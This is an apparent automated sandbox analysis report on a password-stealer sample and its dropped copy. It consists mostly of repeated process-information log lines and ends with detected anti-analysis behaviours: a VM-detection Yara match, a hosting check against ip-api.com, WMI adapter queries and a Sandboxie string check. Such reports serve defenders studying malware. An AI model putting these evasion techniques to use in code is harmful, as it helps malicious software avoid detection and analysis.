Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe PID: 5244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lnYkIr.exe PID: 7344, type: MEMORYSTR

Check if machine is in data center or colocation facility

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\AppData\Roaming\lnYkIr.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe, 00000000.00000002.2146302322.000000000400E000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000A.00000002.2187787442.000000000441F000.00000004.00000800.00020000.00000000.sdmp, lnYkIr.exe, 0000000E.00000002.3365722284.0000000000429000.00000040.00000400.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 1300000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.4960.23508.exe	Memory allocated: 2DD0000 memory reserve \| memory write watch	Jump to behavior
